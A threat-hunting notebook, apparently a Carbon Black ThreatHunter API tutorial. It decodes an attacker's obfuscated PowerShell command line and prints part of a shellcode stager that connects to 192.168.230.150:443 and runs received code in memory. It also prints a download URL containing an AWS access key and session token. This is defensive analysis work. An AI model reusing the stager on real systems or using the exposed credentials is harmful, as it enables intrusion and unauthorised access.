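print([m["process_name"] for m in matches])
```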
 

## Process Summary
We could also have used the process summary API to get a JSON-formatted version of the immediate tree around our process:

In [16]:
ret = th.get_object(f"/threathunter/search/v1/orgs/{orgkey}/processes/summary?process_guid={interesting_process_guid}")
pprint.pprint(ret)

{'children': [{'_s3_location': 'N2ZmRaL5S8uOXU8Pws4v7g:16af4c92814:35f50:1294b:default',
               'backend_timestamp': '2019-05-26T15:36:24.851Z',
               'childproc_count': 4,
               'crossproc_count': 6,
               'device_external_ip': '129.146.76.64',
               'device_group_id': 0,
               'device_id': 9408120,
               'device_internal_ip': '',
               'device_name': 'rj-win10vmw',
               'device_os': 'WINDOWS',
               'device_policy_id': 0,
               'device_timestamp': '2019-05-26T15:30:41.099Z',
               'filemod_count': 31,
               'hits': True,
               'index_class': 'default',
               'modload_count': 49,
               'netconn_count': 1,
               'org_id': '7YZFGDDN',
               'parent_guid': '7YZFGDDN-008f8e78-000012a0-00000000-1d513d7ef9c51a8',
               'parent_hash': ['2a30dac27f340726b1a7ade73eeddcbb',
                               '5948a6366c6ddd600848c

## Interlude: Threat Research Example
Let's dive deeper into the anatomy of that PowerShell attack. First of all, we can see that the command line is actually base64 encoded. Let's decode it:

In [18]:
import base64
cmdline_str ='nVPbTttAEH33V4wsS9iKbTkXEA1C4qa0SG2KCGofojw4m4FsWe9au+MkhubfOwanLYhWVZ+OvTtzzpnLBgKO4cT3phdKXRalsRT692g1qn4vXSjlRzMoq7mSAhzlxIAb4nu41HRFFr5IS1WuTpUyImzP1jFUUhNsWqxbfIiO/lvn3GJOeLNkWOx0qpZ3FcMv5fbrN+32pFH3Tzyy9WPguOgxrpPP828oCCa1IyzSMVI6MeIeybUI4fSNu9PFwqJzo7yQqp4NhyyAlgPWxt7H8FbGM97UJXL4hLiI4u3AK2vICKPa0BtRRl7g0nOjNRsN97rvemn34DDt9bO0u5/txTAY9CP4DqaiRFdKHUFQcnHTU2vzxttz3y41N1ULDP15TehzVsSBGw5k8msUKFcYBuUroge+z7yg/ge+6ZkkNrlCy61ojBtuSr/HnHEWdfYbtXqazRrCzdnIWy+lQghZIVH09+QIHhsnnZdW6zh46OzH3fjP3R6p/M4x29hojGDr3RrLivK4y14k6yIMmq9OhxXYXCAbdzu6V47eI51xoS6c8k7N2MiHXC8URpyVdGdbLyDO5bVImrlBUmAxR3uBt1JLkkZDICAZ5wWC/1Xqfs+HRPOfK3OB8HQyqrRoIh0kZe4cLW3VDOg4oOHwxRPL4qBOP6K+o2WcbfpZljEMssjbOb+uNMkC06elNOUE7UoKdOmn3LplrpoRmrJuOggZz+35cczCYJPu2h5FMfwU4fWj3dTb18eKcbCJG8hebsyEckvJRCGWkExQGL2Aw4NBlm1FTmL5uP0B '
decoded_cmdline_str = base64.b64decode(cmdline_str)
print(decoded_cmdline_str)


b'\x9dS\xdbN\xdb@\x10}\xf7W\x8c,K\xd8\x8am9\x17\x10\rB\xe2\xa6\xb4Hm\x8a\x08j\x1f\xa2<8\x9b\x81lY\xefZ\xbb\xe3$\x86\xe6\xdf;\x06\xa7-\x88VU\x9f\x8e\xbd;s\xce\x99\xcb\x06\x02\x8e\xe1\xc4\xf7\xa6\x17J]\x16\xa5\xb1\x14\xfa\xf7h5\xaa~/](\xe5G3(\xab\xb9\x92\x02\x1c\xe5\xc4\x80\x1b\xe2{\xb8\xd4tE\x16\xbeHKU\xaeN\x952"l\xcf\xd61TR\x13lZ\xac[|\x88\x8e\xfe[\xe7\xdcbNx\xb3dX\xect\xaa\x96w\x15\xc3/\xe5\xf6\xeb7\xed\xf6\xa4Q\xf7O<\xb2\xf5c\xe0\xb8\xe81\xae\x93\xcf\xf3o(\x08&\xb5#,\xd21R:1\xe2\x1e\xc9\xb5\x08\xe1\xf4\x8d\xbb\xd3\xc5\xc2\xa2s\xa3\xbc\x90\xaa\x9e\r\x87,\x80\x96\x03\xd6\xc6\xde\xc7\xf0V\xc63\xde\xd4%r\xf8\x84\xb8\x88\xe2\xed\xc0+k\xc8\x08\xa3\xda\xd0\x1bQF^\xe0\xd2s\xa35\x1b\r\xf7\xba\xefzi\xf7\xe00\xed\xf5\xb3\xb4\xbb\x9f\xed\xc50\x18\xf4#\xf8\x0e\xa6\xa2DWJ\x1dAPrq\xd3Sk\xf3\xc6\xdbs\xdf.57U\x0b\x0c\xfdyM\xe8sV\xc4\x81\x1b\x0ed\xf2k\x14(W\x18\x06\xe5+\xa2\x07\xbe\xcf\xbc\xa0\xfe\x07\xbe\xe9\x99$6\xb9B\xcb\xadh\x8c\x1bnJ\xbf\xc7\x9cq\x16u\xf6\x1b\xb5z\x9a\xcd\x1a\xc2\xcd\xd9\xc8[/\xa

We got a raw byte stream. However, if you pay attention to the PowerShell command line, you will see that this stream is additionally compressed, a very common obfuscation method.
Let's import `zlib` and decompress it:

In [19]:
import zlib
print(zlib.decompress(decoded_cmdline_str, -15))

b'$c = @"\n[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);\n[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);\n"@\ntry{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)\n$s.Connect(\'192.168.230.150\', 443) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0\n$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF\nwhile ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,1,[System.Net.Sockets.SocketFlags]::None) }\nfor ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}\n$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)\n[System.Runtime.I
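
The two decoding steps can be wrapped into one reusable helper. The sketch below does that and checks itself against a harmless payload built with the inverse operation, so it runs without the captured command line. Both function names are hypothetical. The negative `wbits` value tells `zlib` to expect a raw DEFLATE stream with no header, which is what the `DeflateStream` call in the PowerShell command line consumes.

```python
import base64
import zlib

def decode_deflated_base64(encoded):
    """Base64-decode a string, then inflate it as a raw DEFLATE stream."""
    raw = base64.b64decode(encoded)
    # wbits=-15 means raw DEFLATE data with no zlib header or checksum.
    return zlib.decompress(raw, -15).decode("utf-8", errors="replace")

def encode_deflated_base64(text):
    """Inverse helper, used here only to build a harmless test payload."""
    compressor = zlib.compressobj(wbits=-15)
    raw = compressor.compress(text.encode("utf-8")) + compressor.flush()
    return base64.b64encode(raw).decode("ascii")

payload = encode_deflated_base64("Write-Output 'hello'")
print(decode_deflated_base64(payload))
```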

There we go - we can now see the attacker's code.

Now, let's also look at other things that this process did. For example, let's look at that connection. For that, we can dive into the events of the process, using the `Event` entity object:

In [20]:
events = th.select(Event).where(process_guid=powershell_process["process_guid"]).and_(event_type="netconn")
for event in events:
    print(event)

Event object, bound to https://defense-prod05.conferdeploy.net.
-------------------------------------------------------------------------------

       backend_timestamp: 2019-05-26T15:36:24.851Z
       created_timestamp: 2019-06-01T18:29:41.561Z
              event_guid: FEs0uqUIQay1IpPnozXdeA
              event_hash: 8d2452e0cc67f72e8dfd0db338e7f115
         event_timestamp: 2019-05-26T15:30:31.928Z
              event_type: netconn
                  legacy: False
          netconn_action: ACTION_CONNECTION_CREATE
         netconn_inbound: False
      netconn_local_ipv4: -1062672893
      netconn_local_port: 49853
        netconn_protocol: PROTO_TCP
     netconn_remote_ipv4: -1062672746
     netconn_remote_port: 443
            process_guid: 7YZFGDDN-008f8e78-000012fc-00000000-1d513d7f378...


In [21]:
# in case you were wondering what those IP addresses were...
import socket
import struct
socket.inet_ntoa(struct.pack('>i', -1062672746))

'192.168.230.150'
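
The conversion above works because the API reports IPv4 addresses as signed 32-bit integers. As a minimal sketch, the same conversion can be wrapped in two small helpers built on the standard `ipaddress` module. The function names are illustrative and not part of `cbapi`.

```python
import ipaddress


def signed_int_to_ipv4(value: int) -> str:
    """Convert a signed 32-bit integer to dotted-quad notation."""
    # Masking to 32 bits maps negative values onto their unsigned equivalent.
    return str(ipaddress.IPv4Address(value & 0xFFFFFFFF))


def ipv4_to_signed_int(address: str) -> int:
    """Convert dotted-quad notation back to a signed 32-bit integer."""
    unsigned = int(ipaddress.IPv4Address(address))
    # Values with the top bit set are negative in two's complement.
    return unsigned - (1 << 32) if unsigned >= (1 << 31) else unsigned


print(signed_int_to_ipv4(-1062672746))  # netconn_remote_ipv4 from the event above
print(signed_int_to_ipv4(-1062672893))  # netconn_local_ipv4 from the event above
```

The reverse helper is handy when you start from a dotted-quad address and need the integer form that appears in event fields.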

Now we can verify the scope of our intrusion by searching the dataset for any other hosts that may have connected to this malicious network address:

In [22]:
infected_host_query = th.select(Process).where("netconn_ipv4:192.168.230.150")
infected_hosts = set([h.device_name for h in infected_host_query])
print(infected_hosts)

{'rj-win10vmw', 'desktop-1a1jgo5', 'enduser01'}
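
A set of host names shows which machines are affected, but not how active each one was. The sketch below counts matching processes per device instead. It relies only on the `device_name` attribute used above; the sample records are hypothetical stand-ins for query results so that the snippet runs without API access.

```python
from collections import Counter
from types import SimpleNamespace


def count_by_device(processes):
    """Count how many matching processes were seen on each device."""
    return Counter(p.device_name for p in processes)


# Hypothetical stand-ins for the Process objects returned by the query.
sample = [
    SimpleNamespace(device_name=name)
    for name in ("enduser01", "rj-win10vmw", "enduser01")
]

for name, hits in count_by_device(sample).most_common():
    print(f"{name}: {hits}")
```

With a live connection, passing `infected_host_query` in place of `sample` should give the per-host breakdown.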


# Binary Information
Now what about binaries? In CBR, binary information is stored in a separate `module` store that you can query. 
In CBTH, binary information is stored in two different places:
1. Selected binary metadata is stored with the process information and recorded at the time the process reported events.
2. Much more metadata, including first-seen paths, devices, and signatures, as well as the physical binaries themselves, is stored in the Unified Binary Store.

## Metadata Interleaved with Process Data
Metadata interleaved with process data can be used for searching, but not for retrieving data.

In [23]:
query = th.select(Process).where("process_publisher:Microsoft \
                                 process_publisher_state:FILE_SIGNATURE_STATE_SIGNED \
                                 process_publisher_state:FILE_SIGNATURE_STATE_VERIFIED")
print(query[0].process_name)
print(query[2].process_name)
print(query[20].process_name)

query = th.select(Process).where("process_file_description:Outlook")
print(query[0].process_name)
print(query[100].process_name)
print(query[110].process_name)


c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe
c:\program files\windowsapps\microsoft.windowscommunicationsapps_16005.11425.20190.0_x64__8wekyb3d8bbwe\hxtsr.exe
c:\program files (x86)\microsoft office\office15\outlook.exe
c:\program files\windowsapps\microsoft.windowscommunicationsapps_16005.11425.20190.0_x64__8wekyb3d8bbwe\hxtsr.exe
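
The backslash continuations in the first query above leave the indentation whitespace inside the query string. A small helper that joins `field:value` terms with single spaces avoids that and keeps long queries readable. This is only a sketch: `build_query` is a hypothetical helper, not part of `cbapi`, and it does no quoting or escaping of values.

```python
def build_query(terms):
    """Join (field, value) pairs into a space-separated query string."""
    return " ".join(f"{field}:{value}" for field, value in terms)


signed_microsoft = build_query([
    ("process_publisher", "Microsoft"),
    ("process_publisher_state", "FILE_SIGNATURE_STATE_SIGNED"),
    ("process_publisher_state", "FILE_SIGNATURE_STATE_VERIFIED"),
])
print(signed_microsoft)
```

The resulting string can be passed to `th.select(Process).where(...)` just like the literal query.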


## Unified Binary Store

The Unified Binary Store (UBS) has its own set of APIs, which are documented here:

https://developer.carbonblack.com/reference/cb-threathunter/latest/universal-binary-store-api/

Here are some examples. First, let's get the metadata for one of the binaries on our devices (the PowerShell binary from above):

In [24]:
res = th.get_object(f"/ubs/v1/orgs/{orgkey}/sha256/d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5/metadata")
pprint.pprint(res)

{'architecture': ['x86'],
 'available_file_size': 430080,
 'charset_id': 1200,
 'comments': None,
 'company_name': 'Microsoft Corporation',
 'copyright': '© Microsoft Corporation. All rights reserved.',
 'file_available': True,
 'file_description': 'Windows PowerShell',
 'file_size': 430080,
 'file_version': '10.0.15063.0 (WinBuild.160101.0800)',
 'internal_name': 'POWERSHELL',
 'lang_id': 1033,
 'md5': 'be8ffebe1c4b5e18a56101a3c0604ea0',
 'original_filename': 'PowerShell.EXE',
 'os_type': 'WINDOWS',
 'private_build': None,
 'product_description': None,
 'product_name': 'Microsoft® Windows® Operating System',
 'product_version': '10.0.15063.0',
 'sha256': 'd2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5',
 'special_build': None,
 'trademark': None}
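
If you are calling the REST API without `cbapi`, the same metadata lookup is a plain authenticated GET request. The sketch below only builds the request so that it runs offline. It assumes the API expects an `X-Auth-Token` header of the form `<API key>/<connector ID>`; check the authentication documentation for your organization before relying on that. The credential values are placeholders.

```python
import urllib.request

POWERSHELL_SHA256 = "d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5"


def build_ubs_metadata_request(hostname, org_key, sha256, api_key, connector_id):
    """Build (but do not send) a GET request for a binary's UBS metadata."""
    url = f"https://{hostname}/ubs/v1/orgs/{org_key}/sha256/{sha256}/metadata"
    # Assumption: the token format is "<API key>/<connector ID>".
    headers = {"X-Auth-Token": f"{api_key}/{connector_id}"}
    return urllib.request.Request(url, headers=headers, method="GET")


request = build_ubs_metadata_request(
    "defense-prod05.conferdeploy.net",  # URL endpoint from the prerequisites
    "ORGKEY",                            # placeholder org key
    POWERSHELL_SHA256,
    "API_KEY",                           # placeholder credentials
    "CONNECTOR_ID",
)
print(request.get_method(), request.full_url)
# To send it: urllib.request.urlopen(request), then parse the JSON body.
```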


Let's also find the devices that have this file, the paths where it was seen, and the signatures it carries:

In [25]:
res = th.get_object(f"/ubs/v1/orgs/{orgkey}/sha256/d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5/summary/device")
pprint.pprint(res)
res = th.get_object(f"/ubs/v1/orgs/{orgkey}/sha256/d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5/summary/file_path")
pprint.pprint(res)
res = th.get_object(f"/ubs/v1/orgs/{orgkey}/sha256/d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5/summary/signature")
pprint.pprint(res)

{'first_seen_device_id': 8657447,
 'first_seen_device_name': 'DESKTOP-1A1JGO5',
 'first_seen_device_timestamp': '2019-04-25T07:16:29.942347Z',
 'last_seen_device_id': 9510900,
 'last_seen_device_name': 'DESKTOP-1A1JGO5',
 'last_seen_device_timestamp': '2019-05-29T10:58:20.152258Z',
 'num_devices': 5,
 'sha256': 'd2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5'}
{'file_path_count': 1,
 'file_paths': [{'count': 5,
                 'file_path': 'c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe',
                 'first_seen_timestamp': '2019-04-25T07:16:29.942347Z'}],
 'sha256': 'd2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5',
 'total_file_path_count': 5}
{'sha256': 'd2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5',
 'signatures': [{'count': 1,
                 'is_catalog_signature': True,
                 'issuer_name': 'Microsoft Windows Production PCA 2011',
                 'publisher_name': 'Microsoft Windows',
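
The summary responses are plain dictionaries, so they are easy to post-process. As a small sketch, the function below computes how long a binary has been observed from the first-seen and last-seen timestamps in the device summary. The field names and values are copied from the output above; `observation_window` is an illustrative helper, not a `cbapi` function.

```python
from datetime import datetime

# Timestamp layout used in the summary output above.
TIMESTAMP_FORMAT = "%Y-%m-%dT%H:%M:%S.%fZ"


def observation_window(device_summary):
    """Return the time between first and last sighting of the binary."""
    first = datetime.strptime(device_summary["first_seen_device_timestamp"], TIMESTAMP_FORMAT)
    last = datetime.strptime(device_summary["last_seen_device_timestamp"], TIMESTAMP_FORMAT)
    return last - first


# Subset of the device summary shown above.
summary = {
    "first_seen_device_timestamp": "2019-04-25T07:16:29.942347Z",
    "last_seen_device_timestamp": "2019-05-29T10:58:20.152258Z",
    "num_devices": 5,
}

window = observation_window(summary)
print(f"Seen on {summary['num_devices']} devices over {window.days} days")
```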
     

Finally, let's download the file:

In [26]:
ret = th.post_object(f"/ubs/v1/orgs/{orgkey}/file/_download", {"sha256": ["d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5"]})
pprint.pprint(ret.json())

{'error': [],
 'found': [{'sha256': 'd2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5',
            'url': 'https://cdc-file-storage-production-us-east-1.s3.amazonaws.com/d2/43/4e/60/74/51/a4/d2/9d/28/f4/3a/52/92/46/dc/81/d2/5a/2f/ae/9c/27/1e/28/c5/54/52/c0/9a/28/a5/d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5.zip?AWSAccessKeyId=ASIAVT6ZCSICH3DT73OA&Signature=%2FdozJf7VsdXlRTl33llHktBa5sI%3D&x-amz-security-token=AgoJb3JpZ2luX2VjEJv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIEw%2F019%2FMRs2kCchc8jFONxu%2B35kHeTPVKvxG9BP%2FumsAiEAqHXh80uLja1WyER7tmxzbRPrQoaiD6okPaOsJxsoEC4q4wMItP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARABGgwzODY0NjU0MzYxNjQiDDSxF6SJygPpOPQWBCq3A2y10wpI8Kh1FxqpKI5w0LEXd%2FKXQvW5UhygHDXWA9YjeNmzyoM5sxMrmVR8bJX6wwZwH0EFTAR2L1Sx7vuW0VjdACBNm%2Fe3pV9LC%2BxTLdkiI5tYwXoXFyasQPaxBdzuvmpngRi%2B7cni9xzNlaVBy1A0%2FofFf6gB3NBq5JE0CySTG2dULSkmLtwnh6k43G5eu8rl3SKPhbjt9E5uW23Oi8p20Ui5nFwuYzyenpGAKiXYmtlej9JZEeEHCxptSj0Lx4G%2Fw0hLngRXQvaQu2URCiJmVVn6

This returns a CDC URL from which you can download the binary. The download link expires after 1 hour (unless otherwise specified in the request).
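
To act on that response, you can pull the URL for each hash out of the `found` list and fetch it before it expires. The sketch below assumes the response shape shown above (`error` and `found` keys) and that the download is a zip archive, as the `.zip` suffix of the URL suggests. The sample URL is a hypothetical placeholder, and `download` is defined but not called so that the snippet runs offline.

```python
import shutil
import urllib.request


def extract_download_urls(response):
    """Map each found SHA-256 to its temporary download URL."""
    return {item["sha256"]: item["url"] for item in response.get("found", [])}


def download(url, destination):
    """Stream the archive at `url` to the local path `destination`."""
    with urllib.request.urlopen(url) as resp, open(destination, "wb") as out:
        shutil.copyfileobj(resp, out)


# Hypothetical response in the same shape as the output above.
sample_response = {
    "error": [],
    "found": [
        {
            "sha256": "d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5",
            "url": "https://example.invalid/sample.zip",
        }
    ],
}

for sha256, url in extract_download_urls(sample_response).items():
    print(sha256, "->", url)
    # download(url, f"{sha256}.zip")  # uncomment with a real, unexpired URL
```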

# Some More Examples
Let's look at a few additional search examples that show the power of the ThreatHunter search APIs.

## Searching Events
For a given process, find specific events that match a condition:

In [27]:
events = th.select(Event).where(process_guid='7YZFGDDN-008f8e78-000012a0-00000000-1d513d7ef9c51a8').and_(event_type='filemod').and_(filemod_name='\*content.outlook\*')
for event in events:
    print(event.filemod_name)


c:\users\enduser\appdata\local\microsoft\windows\inetcache\content.outlook\4f9r8p01\~$credit_cards_2018 (5).xlsm
c:\users\enduser\appdata\local\microsoft\windows\inetcache\content.outlook\4f9r8p01\~$credit_cards_2018 (5).xlsm
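
The `*content.outlook*` wildcard asks for any file name that contains `content.outlook`. To get a feel for what such a pattern matches, the same check can be approximated locally with the standard `fnmatch` module. This is only an illustration: server-side matching may differ in details such as case handling, and the second path is a hypothetical non-matching example.

```python
from fnmatch import fnmatchcase

PATTERN = "*content.outlook*"

paths = [
    # Path taken from the output above.
    r"c:\users\enduser\appdata\local\microsoft\windows\inetcache"
    r"\content.outlook\4f9r8p01\~$credit_cards_2018 (5).xlsm",
    # Hypothetical path that should not match.
    r"c:\users\enduser\documents\report.docx",
]

matches = [p for p in paths if fnmatchcase(p, PATTERN)]
for path in matches:
    print(path)
```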


## Searching using Regex
Find processes that have long command lines (150 characters or more) and are not GoogleUpdate.exe:

In [28]:
query = th.select(Process).where("process_cmdline:/.{150}.*/ -process_name:GoogleUpdate.exe")
print(query[0])
print(query[0].process_cmdline)

Process object, bound to https://defense-prod05.conferdeploy.net.
-------------------------------------------------------------------------------

       backend_timestamp: 2019-05-21T15:56:45.670Z
         childproc_count: 0
         crossproc_count: 0
            device_group: standard
               device_id: 8929889
      device_internal_ip: 129.213.132.139
             device_name: desktop-1a1jgo5
               device_os: WINDOWS
        device_timestamp: 2019-05-06T23:41:34.451Z
       event_description: The application "<share><link hash="d2434e60745...
                event_id: 7fe02710705811e9a589af189dc2d600
              event_type: CREATE_PROCESS
           filemod_count: 0
    kinesis_partition_id: 7YZFGDDN:0
                  legacy: True
           modload_count: 0
           netconn_count: 0
                  org_id: 7YZFGDDN
           org_size_perc: 9
             parent_guid: 7YZFGDDN-00884261-00000544-00000000-1d504653629...
             parent_hash: ['5948a6366c6
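
The pattern `.{150}.*` reads as "150 characters of anything, followed by anything else", so it selects command lines of at least 150 characters. The sketch below reproduces that test locally with Python's `re` module. It assumes the server-side regex has to match the whole field value, which is why `fullmatch` is used; that anchoring behavior is an assumption rather than something stated above.

```python
import re

# Same pattern as in the query; DOTALL lets "." also match newlines.
LONG_CMDLINE = re.compile(r".{150}.*", re.DOTALL)


def is_long_cmdline(cmdline: str) -> bool:
    """Return True when the command line has at least 150 characters."""
    return LONG_CMDLINE.fullmatch(cmdline) is not None


print(is_long_cmdline("powershell.exe -nop"))          # short command line
print(is_long_cmdline("powershell.exe " + "A" * 200))  # long command line
```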

## Fuzzy Searching 
Find all processes whose names are similar to conhost.exe but are not conhost.exe itself:

In [29]:
query = th.select(Process).where("process_name:conhost.exe~1 -process_name:conhost.exe")
print(len(list(query)))


0
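
A result of 0 means no look-alike names were found in this dataset. To illustrate what the `~1` suffix is looking for, the sketch below assumes it means "within an edit distance of 1" and computes plain Levenshtein distance locally. The exact metric used by the server (for example, whether a transposition counts as one edit) is not stated here, and the candidate names are hypothetical.

```python
def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: insertions, deletions, and substitutions."""
    previous = list(range(len(b) + 1))
    for i, char_a in enumerate(a, start=1):
        current = [i]
        for j, char_b in enumerate(b, start=1):
            cost = 0 if char_a == char_b else 1
            current.append(min(
                previous[j] + 1,         # delete char_a
                current[j - 1] + 1,      # insert char_b
                previous[j - 1] + cost,  # substitute or keep
            ))
        previous = current
    return previous[-1]


TARGET = "conhost.exe"
# Hypothetical process names to screen.
candidates = ["conhost.exe", "c0nhost.exe", "conhosts.exe", "svchost.exe"]

lookalikes = [
    name for name in candidates
    if name != TARGET and edit_distance(name, TARGET) <= 1
]
print(lookalikes)
```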
